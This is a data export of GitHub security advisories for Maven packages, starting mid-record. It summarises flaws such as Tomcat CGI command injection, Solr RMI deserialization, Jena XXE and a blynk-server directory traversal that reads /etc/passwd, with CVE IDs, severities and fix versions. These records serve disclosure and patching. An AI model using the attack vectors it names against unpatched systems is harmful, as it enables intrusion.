{'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E', 'https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28164', 'http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html', 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210611-0006/', 'https://github.com/eclipse/jetty.project', 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E', 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}
null
Maven
GHSA-vx6f-6rp6-f2px
Cross-Site Request Forgery in Jenkins dbCharts Plugin
A cross-site request forgery (CSRF) vulnerability in Jenkins dbCharts Plugin 0.5.2 and earlier allows attackers to connect to an attacker-specified database via JDBC using attacker-specified credentials and to determine if a class is available in the Jenkins instance.
{'CVE-2022-25205'}
2022-02-24T17:33:38Z
2022-02-16T00:01:17Z
HIGH
null
{'CWE-352'}
{'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2177', 'https://github.com/jenkinsci/dbCharts-plugin', 'https://nvd.nist.gov/vuln/detail/CVE-2022-25205'}
null
Maven
GHSA-phg2-9c5g-m4q7
Low severity vulnerability that affects org.apache.spark:spark-core_2.10 and org.apache.spark:spark-core_2.11
In all versions of Apache Spark, its standalone resource manager accepts code to execute on a 'master' host, that then runs that code on 'worker' hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected. # Mitigation Enable authentication on any Spark standalone cluster that is not otherwise secured from unwanted access, for example by network-level restrictions. Use spark.authenticate and related security properties described at https://spark.apache.org/docs/latest/security.html
{'CVE-2018-17190'}
2022-03-03T05:12:54.279201Z
2018-11-21T22:19:30Z
CRITICAL
null
null
{'https://security.gentoo.org/glsa/201903-21', 'https://lists.apache.org/thread.html/341c3187f15cdb0d353261d2bfecf2324d56cb7db1339bfc7b30f6e5@%3Cdev.spark.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17190', 'http://www.securityfocus.com/bid/105976', 'https://github.com/advisories/GHSA-phg2-9c5g-m4q7'}
null
Maven
GHSA-7rp6-w7mg-h8rw
XML External Entity Reference in Apache Jena
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
{'CVE-2021-39239'}
2022-03-03T05:14:16.163243Z
2021-09-20T20:22:05Z
HIGH
null
{'CWE-611'}
{'https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45@%3Cdev.jena.apache.org%3E', 'https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39239', 'https://gitbox.apache.org/repos/asf?p=jena.git', 'https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d@%3Cdev.jena.apache.org%3E', 'https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d@%3Cannounce.apache.org%3E'}
null
Maven
GHSA-7r83-w6r8-fh6w
Reflected Cross-site Scripting (XSS) in ACS Commons
ACS Commons version 4.9.2 (and earlier) suffers from a Reflected Cross-site Scripting (XSS) vulnerability in version-compare and page-compare due to invalid JCR characters that are not handled correctly. An attacker could potentially exploit this vulnerability to inject malicious JavaScript content into vulnerable form fields and execute it within the context of the victim's browser. Exploitation of this issue requires user interaction in order to be successful.
{'CVE-2021-21043'}
2022-03-03T05:13:58.536484Z
2021-05-13T22:31:14Z
MODERATE
null
{'CWE-79', 'CWE-787'}
{'https://helpx.adobe.com/security/products/indesign/apsb21-22.html', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/commit/14d769c86606c4ce9a93c47a19f87e1ad72788d6', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons/security/advisories/GHSA-f92j-qf46-p6vm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21043', 'https://github.com/Adobe-Consulting-Services/acs-aem-commons'}
null
Maven
GHSA-567x-m4wm-87v8
Infinite loop in Apache Tika
A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.
{'CVE-2021-28657'}
2022-04-22T16:02:00.405777Z
2021-05-10T15:23:25Z
MODERATE
null
{'CWE-400', 'CWE-835'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-28657', 'https://lists.apache.org/thread.html/r915add4aa52c60d1b5cf085039cfa73a98d7fae9673374dfd7744b5a%40%3Cdev.tika.apache.org%3E', 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210507-0004/', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html'}
null
Maven
GHSA-q2xp-75m7-gv52
Moderate severity vulnerability that affects net.sf.robocode:robocode.api
Robocode through 1.9.3.5 allows remote attackers to cause external service interaction (DNS), as demonstrated by a query for a unique subdomain name within an attacker-controlled DNS zone, because of a .openStream call within java.net.URL.
{'CVE-2019-10648'}
2022-03-03T05:13:20.114776Z
2019-04-02T15:36:49Z
CRITICAL
null
{'CWE-20', 'CWE-862'}
{'https://sourceforge.net/p/robocode/bugs/406/', 'https://github.com/advisories/GHSA-q2xp-75m7-gv52', 'https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd#diff-0296a8f9d4a509789f4dc4f052d9c36f', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10648'}
null
Maven
GHSA-8vmx-qmch-mpqg
High severity vulnerability that affects org.apache.tomcat.embed:tomcat-embed-core
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
{'CVE-2019-0232'}
2022-03-03T05:14:13.189737Z
2019-04-18T14:27:35Z
HIGH
null
{'CWE-78'}
{'https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/', 'https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190419-0001/', 'http://seclists.org/fulldisclosure/2019/May/4', 'https://lists.apache.org/thread.html/dd4b325cdb261183dbf5ce913c102920a8f09c26dae666a98309165b@%3Cnotifications.ofbiz.apache.org%3E', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2019-784', 'https://lists.apache.org/thread.html/673b6148d92cd7bc99ea2dcf85ad75d57da44fc322d51f37fb529a2a@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/f4d48b32ef2b6aa49c8830241a9475da5b46e451f964b291c7a0a715@%3Cdev.tomcat.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0232', 'https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html', 'https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/a6c87a09a71162fd563ab1c4e70a08a103e0b7c199fc391f1c9c4c35@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/52ffb9fbf661245386a83a661183d13f1de2e5779fa23837a08e02ac@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E', 'http://www.securityfocus.com/bid/107906', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://github.com/advisories/GHSA-8vmx-qmch-mpqg', 'https://access.redhat.com/errata/RHSA-2019:1712', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.synology.com/security/advisory/Synology_SA_19_17', 'https://lists.apache.org/thread.html/5f297a4b9080b5f65a05bc139596d0e437d6a539b25e31d29d028767@%3Cannounce.tomcat.apache.org%3E', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/', 'https://lists.apache.org/thread.html/96849486813a95dfd542e1618b7923ca945508aaf4a4341f674d83e3@%3Cnotifications.ofbiz.apache.org%3E', 'http://packetstormsecurity.com/files/153506/Apache-Tomcat-CGIServlet-enableCmdLineArguments-Remote-Code-Execution.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
Maven
GHSA-2r2v-q399-qq93
Request injection in Spring Cloud Gateway
Applications using Spring Cloud Gateway are vulnerable to specifically crafted requests that could make an extra request on downstream services. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.5+, 2.2.x users should upgrade to 2.2.10.RELEASE or newer.
{'CVE-2021-22051'}
2022-03-03T05:13:47.828210Z
2021-11-10T19:45:02Z
MODERATE
null
{'CWE-863', 'CWE-352'}
{'https://tanzu.vmware.com/security/cve-2021-22051', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22051'}
null
Maven
GHSA-fm6q-97gw-c4wh
Secret exposure in Jenkins HashiCorp Vault Plugin
Jenkins HashiCorp Vault Plugin 3.8.0 and earlier implements functionality that allows agent processes to retrieve any Vault secrets for use on the agent, allowing attackers able to control agent processes to obtain Vault secrets for an attacker-specified path and key.
{'CVE-2022-25186'}
2022-02-24T13:55:23Z
2022-02-16T00:01:28Z
MODERATE
null
{'CWE-693'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-25186', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2429'}
null
Maven
GHSA-qpwj-mvv7-v3m9
High severity vulnerability that affects org.apache.cxf.fediz:fediz-spring and org.apache.cxf.fediz:fediz-spring2
The application plugins in Apache CXF Fediz 1.2.x before 1.2.3 and 1.3.x before 1.3.1 do not match SAML AudienceRestriction values against configured audience URIs, which might allow remote attackers to have bypass intended restrictions and have unspecified other impact via a crafted SAML token with a trusted signature.
{'CVE-2016-4464'}
2022-03-03T05:14:06.612774Z
2018-10-18T16:57:10Z
HIGH
null
{'CWE-284'}
{'https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E', 'https://git-wip-us.apache.org/repos/asf?p=cxf-fediz.git;a=commit;h=0006581e9cacbeef46381a223e5671e524d416b6', 'https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4@%3Ccommits.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c@%3Ccommits.cxf.apache.org%3E', 'http://www.securityfocus.com/bid/92905', 'http://www.openwall.com/lists/oss-security/2016/09/08/20', 'https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E', 'https://github.com/advisories/GHSA-qpwj-mvv7-v3m9', 'http://www.securitytracker.com/id/1036869', 'http://cxf.apache.org/security-advisories.data/CVE-2016-4464.txt.asc', 'https://nvd.nist.gov/vuln/detail/CVE-2016-4464', 'https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf@%3Ccommits.cxf.apache.org%3E', 'https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E'}
null
Maven
GHSA-jh5g-9m4v-9vv9
Insecure Java Deserialization in Apache Karaf
Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder).
{'CVE-2021-41766'}
2022-03-03T05:13:25.812768Z
2022-01-28T22:24:48Z
HIGH
null
{'CWE-502'}
{'https://karaf.apache.org/security/cve-2021-41766.txt', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41766', 'https://gitbox.apache.org/repos/asf?p=karaf.git;h=b42c82c', 'https://issues.apache.org/jira/browse/KARAF-7312', 'https://gitbox.apache.org/repos/asf?p=karaf.git;h=93a019c'}
null
Maven
GHSA-q35p-chc6-7x57
Moderate severity vulnerability that affects org.apache.storm:storm-core
Apache Storm version 1.0.6 and earlier, 1.2.1 and earlier, and version 1.1.2 and earlier expose a vulnerability that could allow a user to impersonate another user when communicating with some Storm Daemons.
{'CVE-2018-1332'}
2022-03-03T05:13:33.924172Z
2018-10-17T19:48:18Z
MODERATE
null
{'CWE-200'}
{'https://lists.apache.org/thread.html/50f1d6a7af27f49d2e498a9ab2975685302cd8ca47000b7c38f339a4@%3Cdev.storm.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1332', 'http://www.securityfocus.com/bid/104399', 'https://github.com/advisories/GHSA-q35p-chc6-7x57'}
null
Maven
GHSA-hwcx-9p4j-7hwj
XML Entity Expansion in Pippo
XML Entity Expansion (Billion Laughs Attack) on Pippo 1.12.0 results in Denial of Service.Entities are created recursively and large amounts of heap memory is taken. Eventually, the JVM process will run out of memory. Otherwise, if the OS does not bound the memory on that process, memory will continue to be exhausted and will affect other processes on the system.
{'CVE-2019-5442'}
2022-03-03T05:13:44.913599Z
2019-06-13T20:22:30Z
HIGH
null
{'CWE-776'}
{'https://hackerone.com/reports/506791', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5442'}
null
Maven
GHSA-xhcq-fv7x-grr2
Critical severity vulnerability that affects org.apache.solr:solr-core
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
{'CVE-2019-0192'}
2022-03-03T05:13:08.040608Z
2019-03-14T15:39:45Z
CRITICAL
null
{'CWE-502'}
{'https://access.redhat.com/errata/RHSA-2019:2413', 'http://www.securityfocus.com/bid/107318', 'https://lists.apache.org/thread.html/b0ace855f569c6b7a0b03ba68566e53b1a1a519abd536bf38978ce4a@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E', 'https://lists.apache.org/thread.html/ec9c572fb803b26ba0318777977ee6d6a2fb3a2c50d9b4224e541d5d@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E', 'http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0192', 'https://lists.apache.org/thread.html/42c5682f4acd1d03bd963e4f47ae448d7cff66c16b19142773818892@%3Cdev.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/d0e608c681dfbb16b4da68d99d43fa0ddbd366bb3bcf5bc0d43c56d7@%3Cdev.lucene.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20190327-0003/', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/advisories/GHSA-xhcq-fv7x-grr2', 'https://lists.apache.org/thread.html/53e4744b14fb7f1810405f8ff5531ab0953a23dd09ce8071ce87e00d@%3Cdev.lucene.apache.org%3E'}
null
Maven
GHSA-v2r2-7qm7-jj6v
Moderate severity vulnerability that affects org.springframework.security:spring-security-core
Spring Security versions 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, and 5.1.x prior to 5.1.5 contain an insecure randomness vulnerability when using SecureRandomFactoryBean#setSeed to configure a SecureRandom instance. In order to be impacted, an honest application must provide a seed and make the resulting random material available to an attacker for inspection.
{'CVE-2019-3795'}
2022-03-03T05:12:35.991699Z
2019-04-16T15:10:59Z
MODERATE
null
{'CWE-330', 'CWE-332'}
{'https://pivotal.io/security/cve-2019-3795', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3795', 'https://github.com/advisories/GHSA-v2r2-7qm7-jj6v', 'https://lists.debian.org/debian-lts-announce/2019/05/msg00026.html', 'http://www.securityfocus.com/bid/107802'}
null
Maven
GHSA-w69w-jvc7-wjgv
Missing Authorization in undertow
undertow before version 2.0.23.Final is vulnerable to an information leak issue. Web apps may have their directory structures predicted through requests without trailing slashes via the api.
{'CVE-2019-10184'}
2022-03-03T05:13:00.686204Z
2019-08-01T19:18:16Z
HIGH
null
{'CWE-862'}
{'https://access.redhat.com/errata/RHSA-2019:2937', 'https://access.redhat.com/errata/RHSA-2019:2935', 'https://access.redhat.com/errata/RHSA-2019:2938', 'https://access.redhat.com/errata/RHSA-2019:2998', 'https://github.com/undertow-io/undertow/pull/794', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10184', 'https://access.redhat.com/errata/RHSA-2019:3050', 'https://access.redhat.com/errata/RHSA-2019:3044', 'https://access.redhat.com/errata/RHSA-2019:3045', 'https://access.redhat.com/errata/RHSA-2020:0727', 'https://access.redhat.com/errata/RHSA-2019:3046', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10184', 'https://security.netapp.com/advisory/ntap-20220210-0016/', 'https://access.redhat.com/errata/RHSA-2019:2936'}
null
Maven
GHSA-65hp-4vxr-c356
Arbitrary code execution in Magnolia CMS
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted CSV/XLS file.
{'CVE-2021-46363'}
2022-02-23T21:53:30Z
2022-02-12T00:00:37Z
HIGH
null
null
{'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46363-Formula%20Injection-Magnolia%20CMS', 'https://nvd.nist.gov/vuln/detail/CVE-2021-46363'}
null
Maven
GHSA-4r64-wf76-c53p
In blynk-server a Directory Traversal exists
In blynk-server in Blynk before 0.39.7, Directory Traversal exists via a ../ in a URI that has /static or /static/js at the beginning, as demonstrated by reading the /etc/passwd file.
{'CVE-2018-17785'}
2022-04-27T14:26:22Z
2018-10-17T19:52:52Z
HIGH
null
{'CWE-22'}
{'https://github.com/blynkkk/blynk-server/issues/1256', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17785', 'https://github.com/blynkkk/blynk-server/releases/tag/v0.39.7', 'https://github.com/advisories/GHSA-4r64-wf76-c53p', 'https://github.com/blynkkk/blynk-server'}
null
Maven
GHSA-mr8h-j9cv-4m8h
Server session is not invalidated when logout() helper method of Authentication module is used in Vaadin 18-19
`Authentication.logout()` helper in `com.vaadin:flow-client` versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out. - https://vaadin.com/security/cve-2021-31408
{'CVE-2021-31408'}
2022-03-03T05:13:36.099285Z
2021-04-22T16:11:17Z
MODERATE
null
{'CWE-287', 'CWE-613'}
{'https://vaadin.com/security/cve-2021-31408', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31408', 'https://github.com/vaadin/flow/pull/10577', 'https://github.com/vaadin/platform/security/advisories/GHSA-mr8h-j9cv-4m8h'}
null
Maven
GHSA-mm7m-xg4h-6m52
Allocation of Resources Without Limits or Throttling in Apache Tika
A carefully crafted package/compressed file that, when unzipped/uncompressed yields the same file (a quine), causes a StackOverflowError in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Apache Tika users should upgrade to 1.22 or later.
{'CVE-2019-10094'}
2022-03-03T05:13:00.263383Z
2019-08-06T01:43:35Z
HIGH
null
{'CWE-770'}
{'https://lists.apache.org/thread.html/39723d8227b248781898c200aa24b154683673287b150a204b83787d@%3Cdev.tika.apache.org%3E', 'https://lists.apache.org/thread.html/da9ee189d1756f8508d0f2386d8e25aca5a6df541739829232be8a94@%3Cdev.tika.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10094', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E', 'https://lists.apache.org/thread.html/fb6c84fd387de997e5e366d50b0ca331a328c466432c80f8c5eed33d@%3Cdev.tika.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/fe876a649d9d36525dd097fe87ff4dcb3b82bb0fbb3a3d71fb72ef61@%3Cdev.tika.apache.org%3E'}
null
Maven
GHSA-99px-7724-484v
Remote Code Execution in Any23
A Remote Code Execution (RCE) vulnerability was discovered in the Any23 YAMLExtractor.java file and is known to affect Any23 versions < 2.5. RCE vulnerabilities allow a malicious actor to execute any code of their choice on a remote machine over LAN, WAN, or internet. RCE belongs to the broader class of arbitrary code execution (ACE) vulnerabilities.
{'CVE-2021-40146'}
2022-03-03T05:12:30.143215Z
2021-09-13T20:06:38Z
CRITICAL
null
null
{'https://nvd.nist.gov/vuln/detail/CVE-2021-40146', 'http://www.openwall.com/lists/oss-security/2021/09/11/2', 'https://lists.apache.org/thread.html/r7c521ed85c7ae1bad4fdf95b459f2aaa8a67eae338636b7b7ec35d86%40%3Cannounce.apache.org%3E', 'https://github.com/apache/any23'}
null
Maven
GHSA-878w-7gxp-mc63
SQL Injection in Spring Cloud Task
In applications using Spring Cloud Task 2.2.4.RELEASE and below, may be vulnerable to SQL injection when exercising certain lookup queries in the TaskExplorer.
{'CVE-2020-5428'}
2022-03-03T05:13:07.394482Z
2022-02-09T22:16:53Z
MODERATE
null
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-5428', 'https://tanzu.vmware.com/security/cve-2020-5428'}
null
Maven
GHSA-36qh-35cm-5w2w
Authentication Bypass by Alternate Name in Apache Tomcat
A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.
{'CVE-2021-30640'}
2022-03-03T05:14:13.437668Z
2021-08-13T15:21:24Z
MODERATE
null
{'CWE-289', 'CWE-287'}
{'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/r59f9ef03929d32120f91f4ea7e6e79edd5688d75d0a9b65fd26d1fe8%40%3Cannounce.tomcat.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210827-0007/', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.debian.org/security/2021/dsa-4952', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.debian.org/debian-lts-announce/2021/08/msg00009.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30640', 'https://www.debian.org/security/2021/dsa-4986'}
null
Maven
GHSA-m4hg-5p2m-fm5m
Arbitrary code execution in Magnolia CMS
An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload.
{'CVE-2021-46361'}
2022-02-23T22:13:17Z
2022-02-12T00:00:37Z
CRITICAL
null
null
{'https://nvd.nist.gov/vuln/detail/CVE-2021-46361', 'https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.12.html#_security_advisory', 'https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46361-FreeMarker%20Bypass-Magnolia%20CMS'}
null
Maven
GHSA-hgpg-593r-hhvp
Cross-site Scripting in Keycloak
A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flaw allows an attacker to conduct cross-site scripting or further attacks.
{'CVE-2020-10748'}
2022-03-03T05:14:18.154149Z
2022-02-09T00:56:37Z
MODERATE
null
{'CWE-79'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1836786', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10748'}
null
